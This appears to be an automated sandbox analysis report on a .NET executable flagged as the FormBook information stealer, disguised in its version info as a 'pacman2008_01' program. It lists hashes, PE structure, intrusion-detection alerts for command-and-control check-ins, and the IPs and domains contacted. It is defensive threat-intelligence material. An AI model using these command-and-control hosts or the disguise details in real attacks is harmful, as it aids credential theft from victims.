                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\9JzK89dRiaBYTuN.exe.log
                                                                  Process:C:\Users\user\Desktop\9JzK89dRiaBYTuN.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1216
                                                                  Entropy (8bit):5.355304211458859
                                                                  Encrypted:false
                                                                  SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                                                  MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                                                  SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                                                  SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                                                  SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                                                  Malicious:true
                                                                  Reputation:high, very likely benign file
                                                                  Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                                                  Static File Info

                                                                  General

                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Entropy (8bit):7.779008586274415
                                                                  TrID:
                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                  • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                  • DOS Executable Generic (2002/1) 0.01%
                                                                  File name:9JzK89dRiaBYTuN.exe
                                                                  File size:1263616
                                                                  MD5:d726ec6e056461dd7d3ce8890c3c9a4e
                                                                  SHA1:4f6b524ab5fa51d9c5465572de8075c857afb686
                                                                  SHA256:77d33d0e8b91781213a971ebc2e6abe4191bf2c28ff0ede19b07db092f590dff
                                                                  SHA512:fba04f9c88251951ce43353300194122cbdcf25ffb3f0d48dc6aec68fbdf5a09a945f3467a47dcef2c166679401910aae300451b91ef56913e5081488167e30d
                                                                  SSDEEP:24576:/0Sfx8DgCfx8DgR8zHf/7jcHuueymkthBrwDZBOmzLLH:r58DgC58Dg+Tzjuuun7HcZBOmPr
                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....:.a.................l............... ........@.. ....................................@................................

                                                                  File Icon

                                                                  Icon Hash:b07968fcd4ec7090

                                                                  Static PE Info

                                                                  General

                                                                  Entrypoint:0x528bd2
                                                                  Entrypoint Section:.text
                                                                  Digitally signed:false
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                                                                  DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                  Time Stamp:0x61073A1C [Mon Aug 2 00:19:40 2021 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:v4.0.30319
                                                                  OS Version Major:4
                                                                  OS Version Minor:0
                                                                  File Version Major:4
                                                                  File Version Minor:0
                                                                  Subsystem Version Major:4
                                                                  Subsystem Version Minor:0
                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                  Entrypoint Preview

                                                                  Instruction
                                                                  jmp dword ptr [00402000h]
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al

                                                                  Data Directories

                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x128b780x57.text
                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x12c0000xd624.rsrc
                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x12a0000xc.reloc
                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                  Sections

                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                  .text0x20000x126bd80x126c00False0.772728477523data7.81629816462IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                  .reloc0x12a0000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                  .rsrc0x12c0000xd6240xd800False0.708369502315data6.65420383784IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                  Resources

                                                                  NameRVASizeTypeLanguageCountry
                                                                  RT_ICON0x12c2b00x2e8data
                                                                  RT_ICON0x12c5980x128GLS_BINARY_LSB_FIRST
                                                                  RT_ICON0x12c6c00xea8data
                                                                  RT_ICON0x12d5680x8a8data
                                                                  RT_ICON0x12de100x568GLS_BINARY_LSB_FIRST
                                                                  RT_ICON0x12e3780x7228PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                                  RT_ICON0x1355a00x25a8data
                                                                  RT_ICON0x137b480x10a8data
                                                                  RT_ICON0x138bf00x468GLS_BINARY_LSB_FIRST
                                                                  RT_GROUP_ICON0x1390580x84data
                                                                  RT_VERSION0x1390dc0x394data
                                                                  RT_MANIFEST0x1394700x1b4XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators

                                                                  Imports

                                                                  DLLImport
                                                                  mscoree.dll_CorExeMain

                                                                  Version Infos

                                                                  DescriptionData
                                                                  Translation0x0000 0x04b0
                                                                  LegalCopyrightCopyright Casper College 2009
                                                                  Assembly Version1.0.0.0
                                                                  InternalNameObjectEqualityCompar.exe
                                                                  FileVersion1.0.0.0
                                                                  CompanyNameCasper College
                                                                  LegalTrademarks
                                                                  Comments
                                                                  ProductNamepacman2008_01
                                                                  ProductVersion1.0.0.0
                                                                  FileDescriptionpacman2008_01
                                                                  OriginalFilenameObjectEqualityCompar.exe

                                                                  Network Behavior

                                                                  Snort IDS Alerts

                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                  08/03/21-18:07:17.797781TCP2031453ET TROJAN FormBook CnC Checkin (GET)4973180192.168.2.634.102.136.180
                                                                  08/03/21-18:07:17.797781TCP2031449ET TROJAN FormBook CnC Checkin (GET)4973180192.168.2.634.102.136.180
                                                                  08/03/21-18:07:17.797781TCP2031412ET TROJAN FormBook CnC Checkin (GET)4973180192.168.2.634.102.136.180
                                                                  08/03/21-18:07:17.910999TCP1201ATTACK-RESPONSES 403 Forbidden804973134.102.136.180192.168.2.6
                                                                  08/03/21-18:07:28.559363TCP1201ATTACK-RESPONSES 403 Forbidden804973434.102.136.180192.168.2.6
                                                                  08/03/21-18:07:34.070441TCP1201ATTACK-RESPONSES 403 Forbidden8049737104.168.135.142192.168.2.6
                                                                  08/03/21-18:08:13.546886TCP1201ATTACK-RESPONSES 403 Forbidden8049750185.53.177.11192.168.2.6

                                                                  Network Port Distribution

                                                                  TCP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Aug 3, 2021 18:07:12.445143938 CEST4973080192.168.2.674.206.228.78
                                                                  Aug 3, 2021 18:07:12.545701981 CEST804973074.206.228.78192.168.2.6
                                                                  Aug 3, 2021 18:07:12.545824051 CEST4973080192.168.2.674.206.228.78
                                                                  Aug 3, 2021 18:07:12.548222065 CEST4973080192.168.2.674.206.228.78
                                                                  Aug 3, 2021 18:07:12.649085045 CEST804973074.206.228.78192.168.2.6
                                                                  Aug 3, 2021 18:07:12.649118900 CEST804973074.206.228.78192.168.2.6
                                                                  Aug 3, 2021 18:07:12.649133921 CEST804973074.206.228.78192.168.2.6
                                                                  Aug 3, 2021 18:07:12.650379896 CEST4973080192.168.2.674.206.228.78
                                                                  Aug 3, 2021 18:07:12.726532936 CEST4973080192.168.2.674.206.228.78
                                                                  Aug 3, 2021 18:07:12.827085972 CEST804973074.206.228.78192.168.2.6
                                                                  Aug 3, 2021 18:07:17.778707027 CEST4973180192.168.2.634.102.136.180
                                                                  Aug 3, 2021 18:07:17.797241926 CEST804973134.102.136.180192.168.2.6
                                                                  Aug 3, 2021 18:07:17.797421932 CEST4973180192.168.2.634.102.136.180
                                                                  Aug 3, 2021 18:07:17.797780991 CEST4973180192.168.2.634.102.136.180
                                                                  Aug 3, 2021 18:07:17.815226078 CEST804973134.102.136.180192.168.2.6
                                                                  Aug 3, 2021 18:07:17.910999060 CEST804973134.102.136.180192.168.2.6
                                                                  Aug 3, 2021 18:07:17.911026955 CEST804973134.102.136.180192.168.2.6
                                                                  Aug 3, 2021 18:07:17.911591053 CEST4973180192.168.2.634.102.136.180
                                                                  Aug 3, 2021 18:07:17.911783934 CEST4973180192.168.2.634.102.136.180
                                                                  Aug 3, 2021 18:07:18.217406988 CEST4973180192.168.2.634.102.136.180
                                                                  Aug 3, 2021 18:07:18.234983921 CEST804973134.102.136.180192.168.2.6
                                                                  Aug 3, 2021 18:07:22.978722095 CEST4973280192.168.2.6184.168.131.241
                                                                  Aug 3, 2021 18:07:23.147085905 CEST8049732184.168.131.241192.168.2.6
                                                                  Aug 3, 2021 18:07:23.147264957 CEST4973280192.168.2.6184.168.131.241
                                                                  Aug 3, 2021 18:07:23.147452116 CEST4973280192.168.2.6184.168.131.241
                                                                  Aug 3, 2021 18:07:23.315705061 CEST8049732184.168.131.241192.168.2.6
                                                                  Aug 3, 2021 18:07:23.338002920 CEST8049732184.168.131.241192.168.2.6
                                                                  Aug 3, 2021 18:07:23.338038921 CEST8049732184.168.131.241192.168.2.6
                                                                  Aug 3, 2021 18:07:23.338474989 CEST4973280192.168.2.6184.168.131.241
                                                                  Aug 3, 2021 18:07:23.338501930 CEST4973280192.168.2.6184.168.131.241
                                                                  Aug 3, 2021 18:07:23.507013083 CEST8049732184.168.131.241192.168.2.6
                                                                  Aug 3, 2021 18:07:28.428195000 CEST4973480192.168.2.634.102.136.180
                                                                  Aug 3, 2021 18:07:28.445549965 CEST804973434.102.136.180192.168.2.6
                                                                  Aug 3, 2021 18:07:28.445682049 CEST4973480192.168.2.634.102.136.180
                                                                  Aug 3, 2021 18:07:28.445873022 CEST4973480192.168.2.634.102.136.180
                                                                  Aug 3, 2021 18:07:28.463072062 CEST804973434.102.136.180192.168.2.6
                                                                  Aug 3, 2021 18:07:28.559362888 CEST804973434.102.136.180192.168.2.6
                                                                  Aug 3, 2021 18:07:28.559396982 CEST804973434.102.136.180192.168.2.6
                                                                  Aug 3, 2021 18:07:28.559622049 CEST4973480192.168.2.634.102.136.180
                                                                  Aug 3, 2021 18:07:28.559803963 CEST4973480192.168.2.634.102.136.180
                                                                  Aug 3, 2021 18:07:28.577097893 CEST804973434.102.136.180192.168.2.6
                                                                  Aug 3, 2021 18:07:33.666811943 CEST4973780192.168.2.6104.168.135.142
                                                                  Aug 3, 2021 18:07:33.868405104 CEST8049737104.168.135.142192.168.2.6
                                                                  Aug 3, 2021 18:07:33.871331930 CEST4973780192.168.2.6104.168.135.142
                                                                  Aug 3, 2021 18:07:33.871361971 CEST4973780192.168.2.6104.168.135.142
                                                                  Aug 3, 2021 18:07:34.070441008 CEST8049737104.168.135.142192.168.2.6
                                                                  Aug 3, 2021 18:07:34.070471048 CEST8049737104.168.135.142192.168.2.6
                                                                  Aug 3, 2021 18:07:34.135035992 CEST4973780192.168.2.6104.168.135.142
                                                                  Aug 3, 2021 18:07:34.135083914 CEST4973780192.168.2.6104.168.135.142
                                                                  Aug 3, 2021 18:07:34.341749907 CEST8049737104.168.135.142192.168.2.6
                                                                  Aug 3, 2021 18:07:39.562280893 CEST4974080192.168.2.6107.165.13.75
                                                                  Aug 3, 2021 18:07:39.742598057 CEST8049740107.165.13.75192.168.2.6
                                                                  Aug 3, 2021 18:07:39.742865086 CEST4974080192.168.2.6107.165.13.75
                                                                  Aug 3, 2021 18:07:39.743015051 CEST4974080192.168.2.6107.165.13.75
                                                                  Aug 3, 2021 18:07:39.920809031 CEST8049740107.165.13.75192.168.2.6
                                                                  Aug 3, 2021 18:07:39.921076059 CEST8049740107.165.13.75192.168.2.6
                                                                  Aug 3, 2021 18:07:39.921245098 CEST4974080192.168.2.6107.165.13.75
                                                                  Aug 3, 2021 18:07:39.921302080 CEST4974080192.168.2.6107.165.13.75
                                                                  Aug 3, 2021 18:07:40.097760916 CEST8049740107.165.13.75192.168.2.6
                                                                  Aug 3, 2021 18:07:45.040502071 CEST4974180192.168.2.6112.213.96.11
                                                                  Aug 3, 2021 18:07:45.303658962 CEST8049741112.213.96.11192.168.2.6
                                                                  Aug 3, 2021 18:07:45.811259985 CEST4974180192.168.2.6112.213.96.11
                                                                  Aug 3, 2021 18:07:46.078480959 CEST8049741112.213.96.11192.168.2.6
                                                                  Aug 3, 2021 18:07:46.589906931 CEST4974180192.168.2.6112.213.96.11
                                                                  Aug 3, 2021 18:07:46.852190018 CEST8049741112.213.96.11192.168.2.6
                                                                  Aug 3, 2021 18:07:50.658178091 CEST4974780192.168.2.6112.213.96.11
                                                                  Aug 3, 2021 18:07:50.931644917 CEST8049747112.213.96.11192.168.2.6
                                                                  Aug 3, 2021 18:07:51.453933954 CEST4974780192.168.2.6112.213.96.11
                                                                  Aug 3, 2021 18:07:51.700221062 CEST8049747112.213.96.11192.168.2.6
                                                                  Aug 3, 2021 18:07:52.204119921 CEST4974780192.168.2.6112.213.96.11
                                                                  Aug 3, 2021 18:07:52.449719906 CEST8049747112.213.96.11192.168.2.6
                                                                  Aug 3, 2021 18:07:57.143922091 CEST4974880192.168.2.645.39.95.186
                                                                  Aug 3, 2021 18:07:57.325524092 CEST804974845.39.95.186192.168.2.6
                                                                  Aug 3, 2021 18:07:57.327033043 CEST4974880192.168.2.645.39.95.186
                                                                  Aug 3, 2021 18:07:57.333901882 CEST4974880192.168.2.645.39.95.186
                                                                  Aug 3, 2021 18:07:57.515420914 CEST804974845.39.95.186192.168.2.6
                                                                  Aug 3, 2021 18:07:57.519463062 CEST804974845.39.95.186192.168.2.6
                                                                  Aug 3, 2021 18:07:57.519486904 CEST804974845.39.95.186192.168.2.6
                                                                  Aug 3, 2021 18:07:57.532351971 CEST4974880192.168.2.645.39.95.186
                                                                  Aug 3, 2021 18:07:57.532391071 CEST4974880192.168.2.645.39.95.186
                                                                  Aug 3, 2021 18:07:57.715282917 CEST804974845.39.95.186192.168.2.6

                                                                  UDP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Aug 3, 2021 18:05:52.724442005 CEST6034253192.168.2.68.8.8.8
                                                                  Aug 3, 2021 18:05:52.752726078 CEST53603428.8.8.8192.168.2.6
                                                                  Aug 3, 2021 18:05:53.505026102 CEST6134653192.168.2.68.8.8.8
                                                                  Aug 3, 2021 18:05:53.529517889 CEST53613468.8.8.8192.168.2.6
                                                                  Aug 3, 2021 18:05:54.296546936 CEST5177453192.168.2.68.8.8.8
                                                                  Aug 3, 2021 18:05:54.322283030 CEST53517748.8.8.8192.168.2.6
                                                                  Aug 3, 2021 18:05:55.081458092 CEST5602353192.168.2.68.8.8.8
                                                                  Aug 3, 2021 18:05:55.109167099 CEST53560238.8.8.8192.168.2.6
                                                                  Aug 3, 2021 18:05:55.708447933 CEST5838453192.168.2.68.8.8.8
                                                                  Aug 3, 2021 18:05:55.741029978 CEST53583848.8.8.8192.168.2.6
                                                                  Aug 3, 2021 18:05:56.529664040 CEST6026153192.168.2.68.8.8.8
                                                                  Aug 3, 2021 18:05:56.565063000 CEST53602618.8.8.8192.168.2.6
                                                                  Aug 3, 2021 18:05:57.260680914 CEST5606153192.168.2.68.8.8.8
                                                                  Aug 3, 2021 18:05:57.286715031 CEST53560618.8.8.8192.168.2.6
                                                                  Aug 3, 2021 18:05:57.942817926 CEST5833653192.168.2.68.8.8.8
                                                                  Aug 3, 2021 18:05:57.968656063 CEST53583368.8.8.8192.168.2.6
                                                                  Aug 3, 2021 18:05:58.943890095 CEST5378153192.168.2.68.8.8.8
                                                                  Aug 3, 2021 18:05:58.978369951 CEST53537818.8.8.8192.168.2.6
                                                                  Aug 3, 2021 18:06:00.243257999 CEST5406453192.168.2.68.8.8.8
                                                                  Aug 3, 2021 18:06:00.276106119 CEST53540648.8.8.8192.168.2.6
                                                                  Aug 3, 2021 18:06:01.416224003 CEST5281153192.168.2.68.8.8.8
                                                                  Aug 3, 2021 18:06:01.451419115 CEST53528118.8.8.8192.168.2.6
                                                                  Aug 3, 2021 18:06:02.738663912 CEST5529953192.168.2.68.8.8.8
                                                                  Aug 3, 2021 18:06:02.764319897 CEST53552998.8.8.8192.168.2.6
                                                                  Aug 3, 2021 18:06:03.569411993 CEST6374553192.168.2.68.8.8.8
                                                                  Aug 3, 2021 18:06:03.595031977 CEST53637458.8.8.8192.168.2.6
                                                                  Aug 3, 2021 18:06:04.382529020 CEST5005553192.168.2.68.8.8.8
                                                                  Aug 3, 2021 18:06:04.411349058 CEST53500558.8.8.8192.168.2.6
                                                                  Aug 3, 2021 18:06:05.236265898 CEST6137453192.168.2.68.8.8.8
                                                                  Aug 3, 2021 18:06:05.270332098 CEST53613748.8.8.8192.168.2.6
                                                                  Aug 3, 2021 18:06:06.276887894 CEST5033953192.168.2.68.8.8.8
                                                                  Aug 3, 2021 18:06:06.309447050 CEST53503398.8.8.8192.168.2.6
                                                                  Aug 3, 2021 18:06:19.918977022 CEST6330753192.168.2.68.8.8.8
                                                                  Aug 3, 2021 18:06:19.973263025 CEST53633078.8.8.8192.168.2.6
                                                                  Aug 3, 2021 18:06:57.880218983 CEST4969453192.168.2.68.8.8.8
                                                                  Aug 3, 2021 18:06:57.912908077 CEST53496948.8.8.8192.168.2.6
                                                                  Aug 3, 2021 18:07:03.642384052 CEST5498253192.168.2.68.8.8.8
                                                                  Aug 3, 2021 18:07:03.685367107 CEST53549828.8.8.8192.168.2.6
                                                                  Aug 3, 2021 18:07:11.220751047 CEST5001053192.168.2.68.8.8.8
                                                                  Aug 3, 2021 18:07:12.234323025 CEST5001053192.168.2.68.8.8.8
                                                                  Aug 3, 2021 18:07:12.437820911 CEST53500108.8.8.8192.168.2.6
                                                                  Aug 3, 2021 18:07:12.437886000 CEST53500108.8.8.8192.168.2.6
                                                                  Aug 3, 2021 18:07:17.741252899 CEST6371853192.168.2.68.8.8.8
                                                                  Aug 3, 2021 18:07:17.776156902 CEST53637188.8.8.8192.168.2.6
                                                                  Aug 3, 2021 18:07:22.926110983 CEST6211653192.168.2.68.8.8.8
                                                                  Aug 3, 2021 18:07:22.973524094 CEST53621168.8.8.8192.168.2.6
                                                                  Aug 3, 2021 18:07:28.378511906 CEST6381653192.168.2.68.8.8.8
                                                                  Aug 3, 2021 18:07:28.426587105 CEST53638168.8.8.8192.168.2.6
                                                                  Aug 3, 2021 18:07:30.276173115 CEST5501453192.168.2.68.8.8.8
                                                                  Aug 3, 2021 18:07:30.320292950 CEST53550148.8.8.8192.168.2.6
                                                                  Aug 3, 2021 18:07:33.568135977 CEST6220853192.168.2.68.8.8.8
                                                                  Aug 3, 2021 18:07:33.662112951 CEST53622088.8.8.8192.168.2.6
                                                                  Aug 3, 2021 18:07:35.600363016 CEST5757453192.168.2.68.8.8.8
                                                                  Aug 3, 2021 18:07:35.650856972 CEST53575748.8.8.8192.168.2.6
                                                                  Aug 3, 2021 18:07:39.115410089 CEST5181853192.168.2.68.8.8.8
                                                                  Aug 3, 2021 18:07:39.550025940 CEST53518188.8.8.8192.168.2.6
                                                                  Aug 3, 2021 18:07:44.992660046 CEST5662853192.168.2.68.8.8.8
                                                                  Aug 3, 2021 18:07:45.027869940 CEST53566288.8.8.8192.168.2.6
                                                                  Aug 3, 2021 18:07:46.608277082 CEST6077853192.168.2.68.8.8.8
                                                                  Aug 3, 2021 18:07:46.655467987 CEST53607788.8.8.8192.168.2.6
                                                                  Aug 3, 2021 18:07:47.579490900 CEST5379953192.168.2.68.8.8.8
                                                                  Aug 3, 2021 18:07:47.619427919 CEST53537998.8.8.8192.168.2.6
                                                                  Aug 3, 2021 18:07:50.571274996 CEST5468353192.168.2.68.8.8.8
                                                                  Aug 3, 2021 18:07:50.635329008 CEST53546838.8.8.8192.168.2.6
                                                                  Aug 3, 2021 18:07:51.863919020 CEST5932953192.168.2.68.8.8.8
                                                                  Aug 3, 2021 18:07:51.926891088 CEST53593298.8.8.8192.168.2.6
                                                                  Aug 3, 2021 18:07:56.952785969 CEST6402153192.168.2.68.8.8.8
                                                                  Aug 3, 2021 18:07:57.142524004 CEST53640218.8.8.8192.168.2.6
                                                                  Aug 3, 2021 18:08:08.066272974 CEST5612953192.168.2.68.8.8.8
                                                                  Aug 3, 2021 18:08:08.105159044 CEST53561298.8.8.8192.168.2.6
                                                                  Aug 3, 2021 18:08:13.457308054 CEST5817753192.168.2.68.8.8.8
                                                                  Aug 3, 2021 18:08:13.495903015 CEST53581778.8.8.8192.168.2.6
                                                                  Aug 3, 2021 18:08:16.292586088 CEST5070053192.168.2.68.8.8.8
                                                                  Aug 3, 2021 18:08:16.351644993 CEST53507008.8.8.8192.168.2.6
                                                                  Aug 3, 2021 18:08:17.017051935 CEST5406953192.168.2.68.8.8.8
                                                                  Aug 3, 2021 18:08:17.053416014 CEST6117853192.168.2.68.8.8.8
                                                                  Aug 3, 2021 18:08:17.067125082 CEST53540698.8.8.8192.168.2.6
                                                                  Aug 3, 2021 18:08:17.100143909 CEST53611788.8.8.8192.168.2.6
                                                                  Aug 3, 2021 18:08:17.576842070 CEST5701753192.168.2.68.8.8.8
                                                                  Aug 3, 2021 18:08:17.615411997 CEST53570178.8.8.8192.168.2.6
                                                                  Aug 3, 2021 18:08:18.074498892 CEST5632753192.168.2.68.8.8.8
                                                                  Aug 3, 2021 18:08:18.106842995 CEST53563278.8.8.8192.168.2.6
                                                                  Aug 3, 2021 18:08:18.559139967 CEST5024353192.168.2.68.8.8.8
                                                                  Aug 3, 2021 18:08:18.709767103 CEST6205553192.168.2.68.8.8.8
                                                                  Aug 3, 2021 18:08:18.750322104 CEST53620558.8.8.8192.168.2.6
                                                                  Aug 3, 2021 18:08:18.765559912 CEST53502438.8.8.8192.168.2.6
                                                                  Aug 3, 2021 18:08:19.477304935 CEST6124953192.168.2.68.8.8.8
                                                                  Aug 3, 2021 18:08:19.512545109 CEST53612498.8.8.8192.168.2.6
                                                                  Aug 3, 2021 18:08:20.044338942 CEST6525253192.168.2.68.8.8.8
                                                                  Aug 3, 2021 18:08:20.078458071 CEST53652528.8.8.8192.168.2.6
                                                                  Aug 3, 2021 18:08:20.484458923 CEST6436753192.168.2.68.8.8.8
                                                                  Aug 3, 2021 18:08:20.511262894 CEST53643678.8.8.8192.168.2.6

                                                                  DNS Queries

                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                  Aug 3, 2021 18:07:11.220751047 CEST192.168.2.68.8.8.80x8498Standard query (0)www.regarta.comA (IP address)IN (0x0001)
                                                                  Aug 3, 2021 18:07:12.234323025 CEST192.168.2.68.8.8.80x8498Standard query (0)www.regarta.comA (IP address)IN (0x0001)
                                                                  Aug 3, 2021 18:07:17.741252899 CEST192.168.2.68.8.8.80x5fe7Standard query (0)www.tapdaugusta.comA (IP address)IN (0x0001)
                                                                  Aug 3, 2021 18:07:22.926110983 CEST192.168.2.68.8.8.80xa868Standard query (0)www.profitsnavigator.comA (IP address)IN (0x0001)
                                                                  Aug 3, 2021 18:07:28.378511906 CEST192.168.2.68.8.8.80x161cStandard query (0)www.konversationswithkoshie.netA (IP address)IN (0x0001)
                                                                  Aug 3, 2021 18:07:33.568135977 CEST192.168.2.68.8.8.80x606eStandard query (0)www.advancedautorepairsonline.comA (IP address)IN (0x0001)
                                                                  Aug 3, 2021 18:07:39.115410089 CEST192.168.2.68.8.8.80xd3fbStandard query (0)www.lovertons.comA (IP address)IN (0x0001)
                                                                  Aug 3, 2021 18:07:44.992660046 CEST192.168.2.68.8.8.80x7a1fStandard query (0)www.sdmdwang.comA (IP address)IN (0x0001)
                                                                  Aug 3, 2021 18:07:50.571274996 CEST192.168.2.68.8.8.80xf741Standard query (0)www.sdmdwang.comA (IP address)IN (0x0001)
                                                                  Aug 3, 2021 18:07:51.863919020 CEST192.168.2.68.8.8.80x41dcStandard query (0)www.sunilpsingh.comA (IP address)IN (0x0001)
